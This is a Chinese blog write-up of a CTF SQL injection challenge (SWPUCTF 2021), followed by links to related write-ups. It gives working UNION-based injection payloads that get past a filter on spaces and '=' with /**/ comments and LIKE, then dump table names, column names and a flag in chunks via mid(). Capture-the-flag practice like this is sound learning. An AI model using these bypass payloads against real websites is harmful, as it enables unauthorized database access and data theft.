[SWPUCTF 2021 新生赛]sql

最新推荐文章于 2024-07-31 17:22:46 发布
最新推荐文章于 2024-07-31 17:22:46 发布
阅读量94 收藏
点赞数
分类专栏: 做题笔记 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Craeper/article/details/131251042
版权

依然是杰哥(

参数是wllm,此次有黑名单(Waf),而且经过了测试,过滤了空格,+和=

绕过方法为/**/,%23,like

?wllm=-1'/**/order/**/by/**/4%23

判断列数

?wllm=-1'/**/union/**/select/**/1,2,3%23

判断显示位

?wllm=-1'/**/union/**/select/**/1,database(),group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/database()%23

显示当前数据库和当前数据库的表

 

?wllm=-1'/**/union/**/select/**/1,2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/'LTLT_flag'%23

显示这个表内的字段名

?wllm=-1'/**/union/**/select/**/1,2,group_concat(flag)/**/from/**/LTLT_flag%23

 显示这个字段的内容(我依然显示的是database(),不必在意)

显示不全怎么办呢,利用mid函数

mid(字符串,开始的位数,读取个数)

?wllm=-1'/**/union/**/select/**/1,database(),mid(group_concat(flag),1,20)/**/from/**/LTLT_flag%23

 第一段和上面显示的内容一样

 

?wllm=-1'/**/union/**/select/**/1,database(),mid(group_concat(flag),20,20)/**/from/**/LTLT_flag%23

第二段显示新东西

 

?wllm=-1'/**/union/**/select/**/1,database(),mid(group_concat(flag),40,20)/**/from/**/LTLT_flag%23

第三段是末尾

将三段拼接起来就可以了 

Cleexile
关注
专栏目录
[SWPUCTF 2021 新生]sql - 联合注入
oZuoShen123的博客
10-07 714
Your Login name:id,flag —— 这里复习了一下任意匹配字符,一开始都以为不用加%,差点忘记了。Your Login name:LTLT_flag,users —— 得到LTLT_flag。1、fuzz看哪些关键字被过滤:空格、substr、=被过滤。这题相比于参考文章的题目多了waf过滤。首先,仍然是网站标题提示参数是wllm。
[SWPUCTF 2021 新生]easy_sql - 联合注入||报错注入||sqlmap
oZuoShen123的博客
10-06 880
得到:XPATH syntax error: ‘~NSSCTF{82bf2238-f61d-41f1-b103-’最终:flag=NSSCTF{82bf2238-f61d-41f1-b103-848e28154cee}得到:XPATH syntax error: ‘~ test_tb,users ~’得到:Your Login name:xxx Your Password:yyy。得到:XPATH syntax error: ‘~ id,flag ~’说明无回显,尝试报错注入。表为:test_db。
NSSCTF练习记录:[SWPUCTF 2021 新生]easy_sql
qq_44396970的博客
07-31 192
3的时候正常回显,4的时候显示Unknown column ‘4’ in ‘order clause’,说明有3列数据。在回显位上,输入database和version查看数据库名和版本。显示出数据库test_db中所有的表名。判断回显位在222处和333处。查看test_tb表中的所有列。查看网页发现参数为wllm。
[SWPUCTF 2021 新生]easy_sql
zoixsoadji的博客
05-06 1474
感谢平台Nssctf 进入题目,说是让我们输入点东西,f12打开源代码,发现要求我们传的参数是wllm 那么我们就传入一个wllm=1,发现有注入点 先查看有几个库:?wllm=-1' order by 1--+ ?wllm=-1' order by 2--+ ?wllm=-1' order by 3--+ 接下来查回显:?wllm=union select 1,2,3--+ 看到回显位是2,3,查库名:?wllm=-1' union select 1,2,databas.
【NSSCTF】刷题记录——[SWPUCTF 2021 新生]系列(WEB篇)
jameshuangchuan的博客
08-08 2981
此处主要在NSSCTF平台()上开展刷题。
[SWPUCTF 2021 新生]web 解题思路,实操解析,解题软件,解题方法
最新发布
09-06
关于sql注入
NSS [SWPUCTF 2021 新生]sql
Jay17的博客
10-26 777
NSS [SWPUCTF 2021 新生]sql
sql [SWPUCTF 2021 新生]easy_sql
m0_75178803的博客
12-21 522
打开题目,直接查看源代码给了提示注入点是wllm。输入1' 报错,说明注入点是字符型注入。我们知道表名有test_tb和users。同样这道题也可以用sqlmap跑一下看看。然后得到了name和password。我们知道数据库名为test_db。我们选择test_tb进行爆破。看见有id和flag两个字段。爆破数据显示位为2,3。我们直接爆破数据库名。
NSSCTF | [SWPUCTF 2021 新生]easy_sql
2302_80946742的博客
05-09 339
因为extractvalue()函数只能返回32个字符,因此我们使用substring()函数解决这个问题:例如substring("abc",1,1),此语句表示从第一个字符读取一个字符返回,在上面的payload中,我们得到的数据中,从第一个字符起读取30个字符返回。打开题目,提示输入一些东西,很显眼的可以看到网站标题为“参数是wllm”我们已经知道了字段数,直接爆库名(注意最后的空格)已经看到了flag字段,直接查看数据。报错了,可以判断为单引号闭合。可以看到一半的flag,然后爆表名(注意空格)
记一次[SWPUCTF 2021 新生]sql
dangwobucunzai的博客
03-12 396
到这里之后开始union注入,发现 = 也是被检测的,可以使用like来代替 = ,先查一下回显点,接下来就开始使用查询系统库来获取表名,直接使用database() 代替数据库名了,就不查询数据库名了。试一试order by,但是发现检测空格,这里可以使用多行注释 /**/ 来代替空格,使用order by 进行探测,到4的时候报错。试了下,发现mid是可以的,但是似乎是限制只能输出这么长,所以还要修改一下mid,做题太久了,一不注意靶场就自动关闭了。找到了flag所在字段,接下来就是查这个字段了。
[NSSCTF]-Web:[SWPUCTF 2021 新生]easy_sql解析
2301_79326813的博客
02-10 979
注意,这里需要把wllm设置为不为1的数(就是让他查不到数据就行,因为wllm=1查得到数据),不然它只会输出wllm=1查询到的数据。得到数据库名称就可以按顺序数据库-表-列来找flag了。有提示,参数是wllm,并且要我们输入点东西。从上图看应该是字符型漏洞,单引号字符注入。所以,我们尝试以get方式传入。报错了,说明字段数是3。有回显,但似乎没啥用。
解:[SWPUCTF 2021 新生]sql--TLS_预备队任务(1)
river_mouth_man的博客
03-07 242
sql注入,过滤了空格,updatexml,left,right,reverse,=。
CTF挑战:SQL注入实战技巧解析
"这篇资源主要分享了CTF(Capture The Flag)比中的SQL注入攻击技巧,包括找到注入点、判断字段、联合查询等步骤,并介绍了如何利用这些技巧获取数据库信息和数据内容。" 在CTF比中,SQL注入是一种常见的安全...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值